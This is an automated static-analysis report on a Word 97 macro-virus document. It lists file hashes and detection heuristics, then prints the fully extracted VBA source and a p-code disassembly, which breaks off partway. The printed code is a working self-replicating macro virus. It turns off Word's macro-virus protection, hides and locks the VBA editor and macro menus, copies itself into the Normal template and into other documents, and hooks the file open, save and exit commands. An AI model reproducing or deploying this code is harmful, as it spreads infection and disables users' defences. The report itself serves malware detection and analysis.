Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 63a318e68468c051…

MALICIOUS

Office (OLE)

50.0 KB Created: 2001-05-05 20:27:00 Authoring application: Microsoft Word 8.0 First seen: 2012-07-06
MD5: 9f3344ec45d154154b24d4fed1c6fbb3 SHA-1: 3c7ec230c890855e8779ffc4f4d3b345cdc36619 SHA-256: 63a318e68468c05130ada4cd80b040993b0815acb775d3b6c5135cf2217ef45f
248 Risk Score

Heuristics 5

  • ClamAV: Doc.Dropper.Agent-1559761 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-1559761
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
          Application.OrganizerCopy Source:=AD.FullName, _
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 24089 bytes
SHA-256: 37ec2034bf5bba909e2477222723ada876d31e48320bec27884c257faa192515
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "MARSandDMarelover"
Public MARSalerts
Public MARSdocsaving
Public MARSnormal
Public MARSdocument
Sub MARSsetup()
    MARSalerts = Application.DisplayAlerts
    Application.DisplayAlerts = wdAlertsNone
    Call MARSbreakdown
    WordBasic.DisableAutoMacros 0
    CommandBars("Visual Basic").Visible = False
    CommandBars("Visual Basic").Enabled = False
    CommandBars("Visual Basic").Protection = msoBarNoChangeVisible
    CommandBars("Visual Basic").Protection = msoBarNoCustomize
    On Error Resume Next
    CommandBars("Tools").Controls("Macro").Delete
    CustomizationContext = NormalTemplate
    FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
    FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
    On Error GoTo 0
End Sub
Sub Hidup_ini_memang_fana_dont_fear_for_your_ill_hi_hi_hi()
Application.DisplayAlerts = MARSalerts
End Sub
Sub USA_is_BAD_country_no1()
    Call MARSbreakdown
    On Error GoTo kita_jalin_cinta_itu_sejak_dulu_kelas1
    MARSnormal = False
    Set AD = ActiveDocument
    Set NT = NormalTemplate
    On Error GoTo cinta_itu_memang_indah_nak_kelas1a
    For i = 1 To NT.VBProject.VBComponents.Count
      NMacr = NT.VBProject.VBComponents(i).Name
      If NMacr = "MARSandDMarelover" Then MARSnormal = True
      If (NMacr <> "MARSandDMarelover") And (NMacr <> "MARS_is_my_flagForm") And (NMacr <> "MARS_funky_abis_form1") And (NMacr <> "ThisDocument") Then
        Application.OrganizerDelete Source:=NT.FullName, _
            Name:=NMacr, Object:=wdOrganizerObjectProjectItems
      End If
    Next i
cinta_itu_memang_indah_nak_kelas1a:
    If MARSnormal = False Then
      On Error GoTo cinta_itu_memang_indah_nak_kelas1
      Application.OrganizerCopy Source:=AD.FullName, _
          Destination:=NT.FullName, Name:= _
          "MARSandDMarelover", Object:=wdOrganizerObjectProjectItems
      Application.OrganizerCopy Source:=AD.FullName, _
          Destination:=NT.FullName, Name:= _
          "MARS_is_my_flagForm", Object:=wdOrganizerObjectProjectItems
      Application.OrganizerCopy Source:=AD.FullName, _
          Destination:=NT.FullName, Name:= _
          "MARS_funky_abis_form1", Object:=wdOrganizerObjectProjectItems
      Templates(NT.FullName).Save
cinta_itu_memang_indah_nak_kelas1:
    End If
kita_jalin_cinta_itu_sejak_dulu_kelas1:
End Sub
Sub Love_kill_War()
    On Error GoTo kita_jalin_cinta_itu_sejak_dulu_kelas2
    MARSdocsaving = 0
    MARSdocument = False
    Set AD = ActiveDocument
    Set NT = NormalTemplate
    On Error GoTo cinta_itu_memang_indah_nak_kelas2a
    For i = 1 To AD.VBProject.VBComponents.Count
      NMacr = AD.VBProject.VBComponents(i).Name
      If NMacr = "MARSandDMarelover" Then MARSdocument = True
      NMacr = NT.VBProject.VBComponents(i).Name
      If NMacr = "MARSandDMarelover" Then MARSdocument = True
      If (NMacr <> "MARSandDMarelover") And (NMacr <> "MARS_is_my_flagForm") And (NMacr <> "MARS_funky_abis_form1") And _
        (NMacr <> "ThisDocument") And (NMacr <> "Reference to Normal") Then
        Application.OrganizerDelete Source:=AD.FullName, _
          Name:=NMacr, Object:=wdOrganizerObjectProjectItems
      End If
    Next i
cinta_itu_memang_indah_nak_kelas2a:
    If MARSdocument = False Then
      On Error GoTo cinta_itu_memang_indah_nak_kelas2
      Application.OrganizerCopy Source:=NT.FullName, _
          Destination:=AD.FullName, Name:= _
          "MARSandDMarelover", Object:=wdOrganizerObjectProjectItems
      Application.OrganizerCopy Source:=NT.FullName, _
          Destination:=AD.FullName, Name:= _
          "MARS_is_my_flagForm", Object:=wdOrganizerObjectProjectItems
      Application.OrganizerCopy Source:=NT.FullName, _
          Destination:=AD.FullName, Name:= _
          "MARS_funky_abis_Form1", Object:=wdOrganizerObjectProjectItems
             
      MARSdocsaving = 1
cinta_itu_memang_indah_nak_kelas2:
    End If
kita_jalin_cinta_itu_sejak_dulu_kelas2:
End Sub
Sub MARS_is_my_flag()
    Call MARSsetup
    Call USA_is_BAD_country_no1
    Call Hidup_ini_memang_fana_dont_fear_for_your_ill_hi_hi_hi
End Sub
Sub MARSbreakdown()
    With Options
        .VirusProtection = False
        .SaveNormalPrompt = False
    End With
End Sub
Sub Sering_Saving_itu_bih_baik()
    On Error GoTo cinta_itu_memang_indah_nak_kelas4
Set AD = ActiveDocument
    If MARSdocsaving = 1 Then
       AD.SaveAs FileName:=AD.Name, FileFormat:=wdFormatDocument
    End If
cinta_itu_memang_indah_nak_kelas4:
End Sub
Sub AutoOpen()
    Call MARS_is_my_flag
End Sub
Sub FileClose()
    Call MARSsetup
    Call USA_is_BAD_country_no1
    Call Love_kill_War
    Call Hidup_ini_memang_fana_dont_fear_for_your_ill_hi_hi_hi
    WordBasic.FileClose
End Sub
Sub FileOpen()
    Call MARS_is_my_flag
    Dialogs(wdDialogFileOpen).Show
    Call MARSsetup
    Call Love_kill_War
    Call Sering_Saving_itu_bih_baik
    Call Hidup_ini_memang_fana_dont_fear_for_your_ill_hi_hi_hi
End Sub
Sub FileSaveAs()
    Call MARSsetup
    Call USA_is_BAD_country_no1
    Call Love_kill_War
    Call Hidup_ini_memang_fana_dont_fear_for_your_ill_hi_hi_hi
    Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub FileSave()
    Call MARSsetup
    Call USA_is_BAD_country_no1
    Call Love_kill_War
    Call Hidup_ini_memang_fana_dont_fear_for_your_ill_hi_hi_hi
    On Error GoTo Errh1
    If ActiveDocument.Saved = False Then ActiveDocument.Save
Errh1:
End Sub
Sub HelpAbout()
    On Error GoTo kita_jalin_cinta_itu_sejak_dulu_kelas3
    MARS_is_my_flagForm.Show
kita_jalin_cinta_itu_sejak_dulu_kelas3:
End Sub
Sub FileExit()
    Call MARSsetup
    Call USA_is_BAD_country_no1
    Call Love_kill_War
    On Error GoTo kita_jalin_cinta_itu_sejak_dulu_kelas4
    If WeekDay(Date) = 6 Then MARS_is_my_flagForm.Show
kita_jalin_cinta_itu_sejak_dulu_kelas4:
    Call Hidup_ini_memang_fana_dont_fear_for_your_ill_hi_hi_hi
    WordBasic.FileExit
End Sub
Sub ToolsOptions()
    Dialogs(wdDialogToolsOptions).Show
    Call MARS_is_my_flag
End Sub
Sub FileNew()
    Call MARS_is_my_flag
    Dialogs(wdDialogFileNew).Show
End Sub
Sub FileTemplates()
    Call MARS_is_my_flag
End Sub
Sub ToolsMacro()
    Call MARS_is_my_flag
End Sub
Sub ToolsCustomize()
    Call MARS_is_my_flag
End Sub
Sub ToolsCustomizeKeyboard()
    Call MARS_is_my_flag
End Sub
Sub ViewVBCode()
    Call MARS_is_my_flag
End Sub
Sub Organizer()
End Sub

Attribute VB_Name = "MARS_is_my_flagForm"
Attribute VB_Base = "0{65D7C826-415A-11D5-A967-E06F4BC10000}{65D7C817-415A-11D5-A967-E06F4BC10000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False











































































































Private Sub CommandButton1_Click()
MARS_funky_abis_form1.Show
Unload Me
End Sub

Private Sub CommandButton2_Click()
MARS_funky_abis_form1.Show
Unload Me
End Sub

Private Sub CommandButton4_Click()
MARS_funky_abis_form1.Show
Unload Me
End Sub

Private Sub Label1_Click()

End Sub

Private Sub UserForm_Click()

End Sub

Attribute VB_Name = "MARS_funky_abis_form1"
Attribute VB_Base = "0{65D7C82A-415A-11D5-A967-E06F4BC10000}{65D7C81F-415A-11D5-A967-E06F4BC10000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False



































Private Sub CommandButton1_Click()
Unload Me
End Sub

' Processing file: /tmp/qstore_dgccauzn
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1120 bytes
' Macros/VBA/MARSandDMarelover - 9199 bytes
' Line #0:
' 	Dim (Public) 
' 	VarDefn MARSalerts
' Line #1:
' 	Dim (Public) 
' 	VarDefn MARSdocsaving
' Line #2:
' 	Dim (Public) 
' 	VarDefn MARSnormal
' Line #3:
' 	Dim (Public) 
' 	VarDefn MARSdocument
' Line #4:
' 	FuncDefn (Sub MARSsetup())
' Line #5:
' 	Ld Application 
' 	MemLd DisplayAlerts 
' 	St MARSalerts 
' Line #6:
' 	Ld wdAlertsNone 
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #7:
' 	ArgsCall (Call) MARSbreakdown 0x0000 
' Line #8:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemCall DisableAutoMacros 0x0001 
' Line #9:
' 	LitVarSpecial (False)
' 	LitStr 0x000C "Visual Basic"
' 	ArgsLd CommandBars 0x0001 
' 	MemSt Visible 
' Line #10:
' 	LitVarSpecial (False)
' 	LitStr 0x000C "Visual Basic"
' 	ArgsLd CommandBars 0x0001 
' 	MemSt Enabled 
' Line #11:
' 	Ld msoBarNoChangeVisible 
' 	LitStr 0x000C "Visual Basic"
' 	ArgsLd CommandBars 0x0001 
' 	MemSt Protection 
' Line #12:
' 	Ld msoBarNoCustomize 
' 	LitStr 0x000C "Visual Basic"
' 	ArgsLd CommandBars 0x0001 
' 	MemSt Protection 
' Line #13:
' 	OnError (Resume Next) 
' Line #14:
' 	LitStr 0x0005 "Macro"
' 	LitStr 0x0005 "Tools"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	ArgsMemCall Delete 0x0000 
' Line #15:
' 	Ld NormalTemplate 
' 	St CustomizationContext 
' Line #16:
' 	Ld wdKeyF11 
' 	Ld wdKeyAlt 
' 	ArgsLd BuildKeyCode 0x0002 
' 	ArgsLd FindKey 0x0001 
' 	ArgsMemCall Disable 0x0000 
' Line #17:
' 	Ld wdKeyF8 
' 	Ld wdKeyAlt 
' 	ArgsLd BuildKeyCode 0x0002 
' 	ArgsLd FindKey 0x0001 
' 	ArgsMemCall Disable 0x0000 
' Line #18:
' 	OnError (GoTo 0) 
' Line #19:
' 	EndSub 
' Line #20:
' 	FuncDefn (Sub Hidup_ini_memang_fana_dont_fear_for_your_ill_hi_hi_hi())
' Line #21:
' 	Ld MARSalerts 
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #22:
' 	EndSub 
' Line #23:
' 	FuncDefn (Sub USA_is_BAD_country_no1())
' Line #24:
' 	ArgsCall (Call) MARSbreakdown 0x0000 
' Line #25:
' 	OnError kita_jalin_cinta_itu_sejak_dulu_kelas1 
' Line #26:
' 	LitVarSpecial (False)
' 	St MARSnormal 
' Line #27:
' 	SetStmt 
' 	Ld ActiveDocument 
' 	Set AD 
' Line #28:
' 	SetStmt 
' 	Ld NormalTemplate 
' 	Set NT 
' Line #29:
' 	OnError cinta_itu_memang_indah_nak_kelas1a 
' Line #30:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld NT 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	For 
' Line #31:
' 	Ld i 
' 	Ld NT 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	St NMacr 
' Line #32:
' 	Ld NMacr 
' 	LitStr 0x0011 "MARSandDMarelover"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitVarSpecial (True)
' 	St MARSnormal 
' 	EndIf 
' Line #33:
' 	Ld NMacr 
' 	LitStr 0x0011 "MARSandDMarelover"
' 	Ne 
' 	Paren 
' 	Ld NMacr 
' 	LitStr 0x0013 "MARS_is_my_flagForm"
' 	Ne 
' 	Paren 
' 	And 
' 	Ld NMacr 
' 	LitStr 0x0015 "MARS_funky_abis_form1"
' 	Ne 
' 	Paren 
' 	And 
' 	Ld NMacr 
' 	LitStr 0x000C "ThisDocument"
' 	Ne 
' 	Paren 
' 	And 
' 	IfBlock 
' Line #34:
' 	LineCont 0x0004 09 00 0C 00
' 	Ld NT 
' 	MemLd FullName 
' 	ParamNamed Source 
' 	Ld NMacr 
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerDelete 0x0003 
' Line #35:
' 	EndIfBlock 
' Line #36:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	NextVar 
' Line #37:
' 	Label cinta_itu_memang_indah_nak_kelas1a 
' Line #38:
' 	Ld MARSnormal 
' 	LitVarSpecial (False)
' 	Eq 
' 	IfBlock 
' Line #39:
' 	OnError cinta_itu_memang_indah_nak_kelas1 
' Line #40:
' 	LineCont 0x0008 09 00 0A 00 11 00 0A 00
' 	Ld AD 
' 	MemLd FullName 
' 	ParamNamed Source 
' 	Ld NT 
' 	MemLd FullName 
' 	ParamNamed Destination 
' 	LitStr 0x0011 "MARSandDMarelover"
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #41:
' 	LineCont 0x0008 09 00 0A 00 11 00 0A 00
' 	Ld AD 
' 	MemLd FullName 
' 	ParamNamed Source 
' 	Ld NT 
' 	MemLd FullName 
' 	ParamNamed Destination 
' 	LitStr 0x0013 "MARS_is_my_flagForm"
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #42:
' 	LineCont 0x0008 09 00 0A 00 11 00 0A 00
' 	Ld AD 
' 	MemLd FullName 
' 	ParamNamed Source 
' 	Ld NT 
' 	MemLd FullName 
' 	ParamNamed Destination 
' 	LitStr 0x0015 "MARS_funky_abis_form1"
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #43:
' 	Ld NT 
' 	MemLd FullName 
' 	ArgsLd Templates 0x0001 
' 	ArgsMemCall Save 0x0000 
' Line #44:
' 	Label cinta_itu_memang_indah_nak_kelas1 
' Line #45:
' 	EndIfBlock 
' Line #46:
' 	Label kita_jalin_cinta_itu_sejak_dulu_kelas1 
' Line #47:
' 	EndSub 
' Line #48:
' 	FuncDefn (Sub Love_kill_War())
' Line #49:
' 	OnError kita_jalin_cinta_itu_sejak_dulu_kelas2 
' Line #50:
' 	LitDI2 0x0000 
' 	St MARSdocsaving 
' Line #51:
' 	LitVarSpecial (False)
' 	St MARSdocument 
' Line #52:
' 	SetStmt 
' 	Ld ActiveDocument 
' 	Set AD 
' Line #53:
' 	SetStmt 
' 	Ld NormalTemplate 
' 	Set NT 
' Line #54:
' 	OnError cinta_itu_memang_indah_nak_kelas2a 
' Line #55:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld AD 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	For 
' Line #56:
' 	Ld i 
' 	Ld AD 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	St NMacr 
' Line #57:
' 	Ld NMacr 
' 	LitStr 0x0011 "MARSandDMarelover"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitVarSpecial (True)
' 	St MARSdocument 
' 	EndIf 
' Line #58:
' 	Ld i 
' 	Ld NT 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	St NMacr 
' Line #59:
' 	Ld NMacr 
' 	LitStr 0x0011 "MARSandDMarelover"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitVarSpecial (True)
' 	St MARSdocument 
' 	EndIf 
' Line #60:
' 	LineCont 0x0004 13 00 08 00
' 	Ld NMacr 
' 	LitStr 0x0011 "MARSandDMarelover"
' 	Ne 
' 	Paren 
' 	Ld NMacr 
' 	LitStr 0x0013 "MARS_is_my_flagForm"
' 	Ne 
' 	Paren 
' 	And 
' 	Ld NMacr 
' 	LitStr 0x0015 "MARS_funky_abis_form1"
' 	Ne 
' 	Paren 
' 	And 
' 	Ld NMacr 
' 	LitStr 0x000C "ThisDocument"
' 	Ne 
' 	Paren 
' 	And 
' 	Ld NMacr 
' 	LitStr 0x0013 "Reference to Normal"
' 	Ne 
' 	Paren 
' 	And 
' 	IfBlock 
' Line #61:
' 	LineCont 0x0004 09 00 0A 00
' 	Ld AD 
' 	MemLd FullName 
' 	ParamNamed Source 
' 	Ld NMacr 
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerDelete 0x0003 
' Line #62:
' 	EndIfBlock 
' Line #63:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	NextVar 
' Line #64:
' 	Label cinta_itu_memang_indah_nak_kelas2a 
' Line #65:
' 	Ld MARSdocument 
' 	LitVarSpecial (False)
' 	Eq 
' 	IfBlock 
' Line #66:
' 	OnError cinta_itu_memang_indah_nak_kelas2 
' Line #67:
' 	LineCont 0x0008 09 00 0A 00 11 00 0A 00
' 	Ld NT 
' 	MemLd FullName 
' 	ParamNamed Source 
' 	Ld AD 
' 	MemLd FullName 
' 	ParamNamed Destination 
' 	LitStr 0x0011 "MARSandDMarelover"
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #68:
' 	LineCont 0x0008 09 00 0A 00 11 00 0A 00
' 	Ld NT 
' 	MemLd FullName 
' 	ParamNamed Source 
' 	Ld AD 
' 	MemLd FullName 
' 	ParamNamed Destination 
' 	LitStr 0x0013 "MARS_is_my_flagForm"
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #69:
' 	LineCont 0x0008 09 00 0A 00 11 00 0A 00
' 	Ld NT 
' 	MemLd FullName 
' 	ParamNamed Source 
' 	Ld AD 
' 	MemLd FullName 
' 	ParamNamed Destination 
' 	LitStr 0x0015 "MARS_funky_abis_Form1"
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #70:
' Line #71:
' 	LitDI2 0x0001 
' 	St MARSdocsaving 
' Line #72:
' 	Label cinta_itu_memang_indah_nak_kelas2 
' Line #73:
' 	EndIfBlock 
' Line #74:
' 	Label kita_jalin_cinta_itu_sejak_dulu_kelas2 
' Line #75:
' 	EndSub 
' Line #76:
' 	FuncDefn (Sub MARS_is_my_flag())
' Line #77:
' 	ArgsCall (Call) MARSsetup 0x0000 
' Line #78:
' 	ArgsCall (Call) USA_is_BAD_country_no1 0x0000 
' Line #79:
' 	ArgsCall (Call) Hidup_ini_memang_fana_dont_fear_for_your_ill_hi_hi_hi 0x0000 
' Line #80:
' 	EndSub 
' Line #81:
' 	FuncDefn (Sub MARSbreakdown())
' Line #82:
' 	StartWithExpr 
' 	Ld Options 
' 	With 
' Line #83:
' 	LitVarSpecial (False)
' 	MemStWith VirusProtection 
' Line #84:
' 	LitVarSpecial (False)
' 	MemStWith SaveNormalPrompt 
' Line #85:
' 	EndWith 
' Line #86:
' 	EndSub 
' Line #87:
' 	FuncDefn (Sub Sering_Saving_itu_bih_baik())
' Line #88:
' 	OnError cinta_itu_memang_indah_nak_kelas4 
' Line #89:
' 	SetStmt 
' 	Ld ActiveDocument 
' 	Set AD 
' Line #90:
' 	Ld MARSdocsaving 
' 	LitDI2 0x0001 
' 	Eq 
' 	IfBlock 
' Line #91:
' 	Ld AD 
' 	MemLd New 
' 	ParamNamed FileName 
' 	Ld wdFormatDocument 
' 	ParamNamed FileFormat 
' 	Ld AD 
' 	ArgsMemCall SaveAs 0x0002 
' Line #92:
' 	EndIfBlock 
' Line #93:
' 	Label cinta_itu_memang_indah_nak_kelas4 
' Line #94:
' 	EndSub 
' Line #95:
' 	FuncDefn (Sub AutoOpen())
' Line #96:
' 	ArgsCall (Call) MARS_is_my_flag 0x0000 
' Line #97:
' 	EndSub 
' Line #98:
' 	FuncDefn (Sub FileClose())
' Line #99:
' 	ArgsCall (Call) MARSsetup 0x0000 
' Line #100:
' 	ArgsCall (Call) USA_is_BAD_country_no1 0x0000 
' Line #101:
' 	ArgsCall (Call) Love_kill_War 0x0000 
' Line #102:
' 	ArgsCall (Call) Hidup_ini_memang_fana_dont_fear_for_your_ill_hi_hi_hi 0x0000 
' Line #103:
' 	Ld WordBasic 
' 	ArgsMemCall FileClose 0x0000 
' Line #104:
' 	EndSub 
' Line #105:
' 	FuncDefn (Sub FileOpen())
' Line #106:
' 	ArgsCall (Call) MARS_is_my_flag 0x0000 
' Line #107:
' 	Ld wdDialogFileOpen 
' 	ArgsLd Dialogs 0x0001 
' 	ArgsMemCall Show 0x0000 
' Line #108:
' 	ArgsCall (Call) MARSsetup 0x0000 
' Line #109:
' 	ArgsCall (Call) Love_kill_War 0x0000 
' Line #110:
' 	ArgsCall (Call) Sering_Saving_itu_bih_baik 0x0000 
' Line #111:
' 	ArgsCall (Call) Hidup_ini_memang_fana_dont_fear_for_your_ill_hi_hi_hi 0x0000 
' Line #112:
' 	EndSub 
' Line #113:
' 	FuncDefn (Sub FileSaveAs())
' Line #114:
' 	ArgsCall (Call) MARSsetup 0x0000 
' Line #115:
' 	ArgsCall (Call) USA_is_BAD_country_no1 0x0000 
' Line #116:
' 	ArgsCall (Call) Love_kill_War 0x0000 
' Line #117:
' 	ArgsCall (Call) Hidup_ini_memang_fana_dont_fear_for_your_ill_hi_hi_hi 0x0000 
' Line #118:
' 	Ld wdDialogFileSaveAs 
' 	ArgsLd Dialogs 0x0001 
' 	ArgsMemCall Show 0x0000 
' Line #119:
' 	EndSub 
' Line #120:
' 	FuncDefn (Sub FileSave())
' Line #121:
' 	ArgsCall (Call) MARSsetup 0x0000 
' Line #122:
' 	ArgsCall (Call) USA_is_BAD_country_no1 0x0000 
' Line #123:
' 	ArgsCall (Call) Love_kill_War 0x0000 
' Line #124:
' 	ArgsCall (Call) Hidup_ini_memang_fana_dont_fear_for_your_ill_hi_hi_hi 0x0000 
' Line #125:
' 	OnError Errh1 
' Line #126:
' 	Ld ActiveDocument 
' 	MemLd Saved 
' 	LitVarSpecial (False)
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	Ld ActiveDocument 
' 	ArgsMemCall Save 0x0000 
' 	EndIf 
' Line #127:
' 	Label Errh1 
' Line #128:
' 	EndSub 
' Line #129:
' 	FuncDefn (Sub HelpAbout())
' Line #130:
' 	OnError kita_jalin_cinta_itu_sejak_dulu_kelas3 
' Line #131:
' 	Ld MARS_is_my_flagForm 
' 	ArgsMemCall Show 0x0000 
' Line #132:
' 	Label kita_jalin_cinta_itu_sejak_dulu_kelas3 
' Line #133:
' 	EndSub 
' Line #134:
' 	FuncDefn (Sub FileExit())
' Line #135:
' 	ArgsCall (Call) MARSsetup 0x0000 
' Line #136:
' 	ArgsCall (Call) USA_is_BAD_country_no1 0x0000 
' Line #137:
' 	ArgsCall (Call) Love_kill_War 0x0000 
' Line #138:
' 	OnError kita_jalin_cinta_itu_sejak_dulu_kelas4 
' Line #139:
' 	Ld Date 
' 	ArgsLd WeekDay 0x0001 
' 	LitDI2 0x0006 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	Ld MARS_is_my_flagForm 
' 	ArgsMemCall Show 0x0000 
' 	EndIf 
' Line #140:
' 	Label kita_jalin_cinta_itu_sejak_dulu_kelas4 
' Line #141:
' 	ArgsCall (Call) Hidup_ini_memang_fana_dont_fear_for_your_ill_hi_hi_hi 0x0000 
' Line #142:
' 	Ld WordBasic 
' 	ArgsMemCall FileExit 0x0000 
' Line #143:
' 	EndSub 
' Line #144:
' 	FuncDefn (Sub ToolsOptions())
' Line #145:
' 	Ld wdDialogToolsOptions 
' 	ArgsLd Dialogs 0x0001 
' 	ArgsMemCall Show 0x0000 
' Line #146:
' 	ArgsCall (Call) MARS_is_my_flag 0x0000 
' Line #147:
' 	EndSub 
' Line #148:
' 	FuncDefn (Sub FileNew())
' Line #149:
' 	ArgsCall (Call) MARS_is_my_flag 0x0000 
' Line #150:
' 	Ld wdDialogFileNew 
' 	ArgsLd Dialogs 0x0001 
' 	ArgsMemCall Show 0x0000 
' Line #151:
' 	EndSub 
' Line #152:
' 	FuncDefn (Sub FileTemplates())
' Line #153:
' 	ArgsCall (Call) MARS_is_my_flag 0x0000 
' Line #154:
' 	EndSub 
' Line #155:
' 	FuncDefn (Sub ToolsMacro())
' Line #156:
' 	ArgsCall (Call) MARS_is_my_flag 0x0000 
' Line #157:
' 	EndSub 
' Line #158:
' 	FuncDefn (Sub ToolsCustomize())
' Line #159:
' 	ArgsCall (Call) MARS_is_my_flag 0x0000 
' Line #160:
' 	EndSub 
' Line #161:
' 	FuncDefn (Sub ToolsCustomizeKeyboard())
' Line #162:
' 	ArgsCall (Call) MARS_is_my_flag 0x0000 
' Line #163:
…